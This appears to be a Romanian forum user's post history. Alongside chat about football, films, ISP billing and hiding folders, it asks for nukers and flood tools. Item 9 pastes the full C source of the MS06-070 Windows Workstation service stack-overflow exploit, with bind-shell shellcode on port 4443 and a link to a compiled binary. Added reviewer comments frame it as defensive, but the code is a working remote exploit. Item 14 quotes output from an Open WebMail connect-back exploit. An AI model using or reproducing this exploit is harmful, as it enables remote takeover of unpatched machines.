
Christian


  1. asta stiam deja...dar nu gasesc nici un nuker care sa aiba vre-un efect asupra lui..hai ca deja incepem sa devenim offtopic.
  2. dar ceva pt vypress nu aveti? nici asta nu are efect...nu am gasit prog de flood pt el
  3. Marc et Claude - Tremble (vinil club mix) & in coada de asteptare Happy Fathers - Bounce
  4. si eu am conexiune tot prin PPPoE (nu ierdeesh) cu 3 feluri de tarifare 1. Net non-stop = 10$ 2. 12 ore/zi = 7$ 3. 200 ore/luna = 7$ insa am inteles ca la a 3-a varianta exista o smecherie prin care poti sa te conectezi chiar daca ai terminat cele 200 ore ..stie cineva ceva??
  5. sincer nici tie nu ti-ar strica :@ probabil ca nu merge numai in LAN ..ip-ul caruia ii dai shutdown trebuie sa aiba portul 135 (sau 445 ..nu`s sigur) deschis..insa majoritatea providerilor blocheaza porturile astea si in cele mai multe cazuri n`o sa mearga
  6. hai ca deja incepeti sa o dati in SF ... acum incep sa inteleg de ce sunt interzise unele filme copiilor sun 12 ani oricum povestea cu virusul numit prostie e REALA !! cunosc cateva persoane infectate ..noroc ca nu e contagios
  7. ce versiune de windows este afectata ? banuiesc ca win2k am incercat peWinXp SP1 si SP2 si nu merge ..
  8. nu cred ca ar face asta ..el se straduieste sa creasca in ochii romanilor ..iti dai seama cum l-ar privi romanii daca i-ar da afara din case da` ce ... tu nu te distrezi ? parerea ta! stie el ce stie..uite ca l-a ajutat dumnezeu si azi ..a facut egal cu pandurii :@ mare noroc cu siguranta nu au lana de aur dar are el rotitzele din cap bine unse concluzia ... JIJI RULZZZZZZZ !!! :@
  9. /*************************************************************************** Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit by cocoruder(frankruder_at_hotmail.com),2006.11.15 page:[url]http://ruder.cdut.net/default.asp[/url] Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to correct jmp EBX address and fixed exploit output status. Should work on Windows 2000 Server SP4 (All Languages) usage: ms06070 targetip DomainName notice: Make sure the DomainName is valid and live,more informations see [url]http://research.eeye.com/html/advisories/published/AD20061114.html[/url], cocoruder just research the vulnerability and give the exploit for Win2000. ****************************************************************************/ /* Reviewer note: archived proof-of-concept for the Workstation service (wkssvc) NetrJoinDomain2 stack overflow addressed by MS06-070; the header above names Windows 2000 Server SP4 as the affected target. The listing talks SMB to TCP 445 (negotiate, session setup, tree connect whose template path ends in IPC$, open of the wkssvc pipe, RPC bind) and then sends one NetrJoinDomain2 call (opnum 0x16, per the inline comment in the header template) whose domain-name argument is padded to several kilobytes. Defensive takeaways: apply the MS06-070 update, keep TCP 445 unreachable from untrusted networks, and treat a wkssvc NetrJoinDomain2 request carrying a multi-kilobyte name as hostile. The paste is collapsed onto a few physical lines; read it as an analysis artifact. */ #include <stdio.h> #include <windows.h> #include <winsock.h> #include <tchar.h> #pragma comment(lib, "wsock32.lib") unsigned char SmbNeg[] = "x00x00x00x2fxffx53x4dx42x72x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x88x05x00x00x00x00x00x0cx00x02x4ex54" "x20x4cx4dx20x30x2ex31x32x00"; unsigned char Session_Setup_AndX_Request[]= "x00x00x00x48xffx53x4dx42x73x00" "x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00xffxffx88x05x00x00x00x00x0dxffx00x00x00xff" "xffx02x00x88x05x00x00x00x00x00x00x00x00x00x00x00" "x00x01x00x00x00x0bx00x00x00x6ex74x00x70x79x73x6d" "x62x00"; unsigned char TreeConnect_AndX_Request[]= "x00x00x00x58xffx53x4dx42x75x00" "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00xffxfex00x08x00x03x04xffx00x58x00x08" "x00x01x00x2dx00x00x5cx00x5cx00x31x00x37x00x32x00" "x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x36x00" "x5cx00x49x00x50x00x43x00x24x00x00x00x3fx3fx3fx3f" "x3fx00"; unsigned char NTCreate_AndX_Request[]= "x00x00x00x64xffx53x4dx42xa2x00" "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00" "x00x00x00x08x04x0cx00x08x00x01x18xffx00xdexdex00" "x0ex00x16x00x00x00x00x00x00x00x9fx01x02x00x00x00" "x00x00x00x00x00x00x00x00x00x00x03x00x00x00x01x00" 
"x00x00x40x00x40x00x02x00x00x00x01x11x00x00x5cx00" "x77x00x6bx00x73x00x73x00x76x00x63x00x00x00"; unsigned char Rpc_Bind_Wkssvc[]= "x00x00x00x92xffx53x4dx42x25x00" "x00x00x00x18x01x20x00x00x00x00x00x00x00x00x00x00" "x00x00x01x08xf0x0bx03x08xf7x4cx10x00x00x48x00x00" "x04xe0xffx00x00x00x00x00x00x00x00x00x00x00x00x4a" "x00x48x00x4ax00x02x00x26x00x01x40x4fx00x5cx50x49" "x50x45x5cx00x05x00x0bx03x10x00x00x00x48x00x00x00" "x00x00x00x00xd0x16xd0x16x00x00x00x00x01x00x00x00" "x00x00x01x00x98xd0xffx6bx12xa1x10x36x98x33x46xc3" "xf8x7ex34x5ax01x00x00x00x04x5dx88x8axebx1cxc9x11" "x9fxe8x08x00x2bx10x48x60x02x00x00x00"; unsigned char Rpc_NetrJoinDomain2_Header[]= "x00x00x00xa8xffx53x4dx42x25x00" "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00" "x00x00x00x08x6cx07x00x08xc0x01x10x00x00x54x00x00" "x00x00x04x00x00x00x00x00x00x00x00x00x00x00x00x54" "x00x54x00x54x00x02x00x26x00x00x40x65x00x00x5cx00" "x50x00x49x00x50x00x45x00x5cx00x00x00x00x00x05x00" "x00x03x10x00x00x00x54x00x00x00x01x00x00x00x3cx00" "x00x00x00x00" "x16x00" //opnum,NetrJoinDomain2 "x30x2ax42x00" "x0ex00x00x00" "x00x00x00x00" "x0ex00x00x00" "x5cx00x5cx00x31x00x37x00x32x00" "x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x31x00" "x00x00" "x10x01x00x00" "x00x00x00x00" "x10x01x00x00"; unsigned char Rpc_NetrJoinDomain2_End[]= "x00x00x00x00" "x00x00x00x00" "x00x00x00x00" "x01x00x00x00"; unsigned char *lpDomainName=NULL; DWORD dwDomainNameLen=0; /* Reviewer note: per the generator comment that follows, the payload blob is a bind listener on TCP 4443 (the final printf in main points at the same port); an unexpected listener on 4443 on a Windows 2000 host is a useful compromise indicator. */ /* win32_bind - EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub [url]http://metasploit.com[/url] */ unsigned char shellcode[] = "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xe9" "x59x23xcex83xebxfcxe2xf4x15x33xc8x83x01xa0xdcx31" "x16x39xa8xa2xcdx7dxa8x8bxd5xd2x5fxcbx91x58xccx45" "xa6x41xa8x91xc9x58xc8x87x62x6dxa8xcfx07x68xe3x57" "x45xddxe3xbaxeex98xe9xc3xe8x9bxc8x3axd2x0dx07xe6" "x9cxbcxa8x91xcdx58xc8xa8x62x55x68x45xb6x45x22x25" "xeax75xa8x47x85x7dx3fxafx2ax68xf8xaax62x1ax13x45" "xa9x55xa8xbexf5xf4xa8x8exe1x07x4bx40xa7x57xcfx9e" "x16x8fx45x9dx8fx31x10xfcx81x2ex50xfcxb6x0dxdcx1e" 
"x81x92xcex32xd2x09xdcx18xb6xd0xc6xa8x68xb4x2bxcc" "xbcx33x21x31x39x31xfaxc7x1cxf4x74x31x3fx0ax70x9d" "xbax0ax60x9dxaax0axdcx1ex8fx31x32x95x8fx0axaax2f" "x7cx31x87xd4x99x9ex74x31x3fx33x33x9fxbcxa6xf3xa6" "x4dxf4x0dx27xbexa6xf5x9dxbcxa6xf3xa6x0cx10xa5x87" "xbexa6xf5x9exbdx0dx76x31x39xcax4bx29x90x9fx5ax99" "x16x8fx76x31x39x3fx49xaax8fx31x40xa3x60xbcx49x9e" "xb0x70xefx47x0ex33x67x47x0bx68xe3x3dx43xa7x61xe3" "x17x1bx0fx5dx64x23x1bx65x42xf2x4bxbcx17xeax35x31" "x9cx1dxdcx18xb2x0ex71x9fxb8x08x49xcfxb8x08x76x9f" "x16x89x4bx63x30x5cxedx9dx16x8fx49x31x16x6exdcx1e" "x62x0exdfx4dx2dx3dxdcx18xbbxa6xf3xa6x19xd3x27x91" "xbaxa6xf5x31x39x59x23xce"; DWORD fill_len_1 =0x84c; //fill data DWORD fill_len_2 =0x1000; //fill rubbish data DWORD addr_jmp_ebx=0x77F92A9B; //jmp ebx address,in ntdll.dll unsigned char code_jmp8[]= //jmp 8 "xEBx06x90x90"; unsigned char *Rpc_NetrJoinDomain2=NULL; DWORD dwRpc_NetrJoinDomain2=0; unsigned char recvbuff[2048]; /* showinfo: prints the banner and usage text; nothing in this listing calls it. */ void showinfo(void) { printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploitn"); printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15n"); printf("page:http://ruder.cdut.net/default.aspnn"); printf("Code fixed by S A Stevens - 16.11.2006n"); printf("Should work on Windows 2000 Server SP4 (All Languages)nn"); printf("usage:n"); printf("ms06070 targetip DomainNamenn"); printf("notice:n"); printf("Make sure the DomainName is valid and live,more informations seen"); printf("http://research.eeye.com/html/advisories/published/AD20061114.html,n"); printf("cocoruder just research the vulnerability and give the exploit for Win2000.nnn"); } /* neg: sends the SmbNeg template (sizeof minus the trailing NUL) on socket s. The local response buffer is cleared but never read here; the reply is consumed by the recv() that main issues right after the call. */ void neg ( int s ) { char response[1024]; memset(response,0,sizeof(response)); send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0); } /* MakeAttackPacket: converts lpDomainNameStr to a wide string in the global lpDomainName, then allocates the global Rpc_NetrJoinDomain2 buffer (its length goes to dwRpc_NetrJoinDomain2) and lays out, in order, the header template, the domain name, filler, the jmp stub and address word named in the inline comments, the payload blob, fill_len_2 bytes of 0x41, a terminator and the Rpc_NetrJoinDomain2_End template. Returns nothing: if the second malloc fails it prints a message and returns with Rpc_NetrJoinDomain2 still NULL. NOTE(review): the first malloc result is used unchecked and neither buffer is freed. For detection, the distinguishing property is the size of the name argument (fill_len_1 = 0x84c plus fill_len_2 = 0x1000 bytes of filler). */ void MakeAttackPacket(char *lpDomainNameStr) { DWORD j,len,b_flag; dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2; lpDomainName=(unsigned char *)malloc(dwDomainNameLen); memset(lpDomainName,0,dwDomainNameLen); 
MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen); *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C; *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C; len=dwDomainNameLen+ //DomainName fill_len_1-3*2+ //fill_len_1 4+ //jmp 8 4+ //addr jmp ebx sizeof(shellcode)-1+ //shellcode fill_len_2+ //fill_len_2 2; //0x0000 b_flag=0; if (len%2==1) { len++; b_flag=1; } dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+ len+ sizeof(Rpc_NetrJoinDomain2_End)-1; //end //malloc Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2); if (Rpc_NetrJoinDomain2==NULL) { printf("malloc error!n"); return; } //fill nop memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2); j=sizeof(Rpc_NetrJoinDomain2_Header)-1; //update para1 length *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2; *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2; //copy header memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1); j=sizeof(Rpc_NetrJoinDomain2_Header)-1; //copy DomainName memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen); j=j+dwDomainNameLen; //calculate offset j=j+fill_len_1-3*2; //jmp 8 memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1); j=j+4; //jmp ebx address *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx; j=j+4; //copy shellcode memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1); j=j+sizeof(shellcode)-1; //fill data memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2); j=j+fill_len_2; //0x0000(NULL) if (b_flag==0) { Rpc_NetrJoinDomain2[j]=0x00; Rpc_NetrJoinDomain2[j+1]=0x00; j=j+2; } else if (b_flag==1) { Rpc_NetrJoinDomain2[j]=0x00; Rpc_NetrJoinDomain2[j+1]=0x00; Rpc_NetrJoinDomain2[j+2]=0x00; j=j+3; } //copy other parameter memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1); j=j+sizeof(Rpc_NetrJoinDomain2_End)-1; } /* main: takes argv[1] as the target IP and argv[2] as the domain name; argc is not checked. Connects to TCP 445 and sends the request templates in order, copying the user id, tree id and file id from fixed offsets in recvbuff (0x20, 0x1c, 0x2a) into the next template before each send. NOTE(review): recv() results are never checked, so those ids are read from recvbuff even after a short or empty reply; the pointer set by MakeAttackPacket is used without a NULL check; every error path returns without closesocket(); and void main is non-standard. */ void main(int argc,char **argv) { WSADATA ws; struct sockaddr_in server; SOCKET sock; DWORD ret; WORD 
userid,treeid,fid; WSAStartup(MAKEWORD(2,2),&ws); sock = socket(AF_INET,SOCK_STREAM,0); if(sock<=0) { return; } server.sin_family = AF_INET; server.sin_addr.s_addr = inet_addr(argv[1]); server.sin_port = htons((USHORT)445); printf("[+] Connecting %sn",argv[1]); ret=connect(sock,(struct sockaddr *)&server,sizeof(server)); if (ret==-1) { printf("Connection Error, Port 445 Firewalled?n"); return; } neg(sock); recv(sock,(char *)recvbuff,sizeof(recvbuff),0); ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0); if (ret<=0) { printf("send Session_Setup_AndX_Request error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); userid=*(WORD *)(recvbuff+0x20); //get userid memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0); if (ret<=0) { printf("send TreeConnect_AndX_Request error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); treeid=*(WORD *)(recvbuff+0x1c); //get treeid //send NTCreate_AndX_Request memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2); //update userid memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2); //update treeid ret=send(sock,(char *)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0); if (ret<=0) { printf("send NTCreate_AndX_Request error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); fid=*(WORD *)(recvbuff+0x2a); //get fid //rpc bind memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2); memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2); memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2); *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4); ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0); if (ret<=0) { printf("send Rpc_Bind_Wkssvc error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); MakeAttackPacket((char *)argv[2]); memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2); memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2); 
memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2); *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4); *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58; //update Total Data Count *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58; //update Data Count *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47; //update Byte Count *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58; //update Frag Length ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0); if (ret<=0) { printf("send Rpc_NetrJoinDomain2 error!n"); return; } printf("[+] Sent attack packet successfully, Try telnet on %s:4443?n",argv[1]); recv(sock,(char *)recvbuff,sizeof(recvbuff),0); closesocket(sock); } // milw0rm.com [2006-11-17] and the compiled version: http://share.urbanfriends.us/savefile_php/uploads/f783ca4bda.rar
  10. imi cer scuze ..versiunea anterioara am pierdut-o cu sursa cu tot dupa o formatare neprogramata iar versiunea asta am facut-o ulterior, in graba si probabil am gresit ceva .. o sa-mi fac timp zilele astea pt a repara eventualele greseli :@
  11. Nu e complet invizibil. Prin comanda attrib +H +S il faci Hidden si System, insa daca dai de la Folder Options > Show hidden files and folders si debifezi Hide protected operating system files o sa il vezi yep` ...u`r right dar sa fim seriosi ..cati crezi ca stiu de optiunea aia ? eu unu` nu stiam
  12. ar mai fi o a 3-a varianta si anume ascunderea cu ajutorul comenzii attrib ex: dai in CMD comanda "attrib +H +S FolderName" astfel folderul o sa fie complet invizibil
  13. link nou: http://share.urbanfriends.us/savefile_php/uploads/6df49cee38.rar
  14. Chiar aveam nevoie de un exploit pt Open WebMail ... l-am testat pe Open WebMail version 1.81 si rezultatul este: [+] Listen on port: 4444 [+] Prepairing ShellCode...Done! [+] Inject Shellcode to out host...Done! [+] Chmod our ShellCode on host...Done! [+] Exec ShellCode...Done! [+] Wait for Connect-back Can't Hack User defined signal 2 any ideas ? :?
  15. 10x ppl ! majoritatea filmelor pe care le-ati mentionat nu le-am vazut asa ca am de downloadat nu gluma ..noroc cu provideru ca mi-a marit din nou viteza de download btw daca mai stie cineva nume de filme peste care merita sa tragi un ochi cred ca nu s-ar supara nimeni daca le-ati posta aici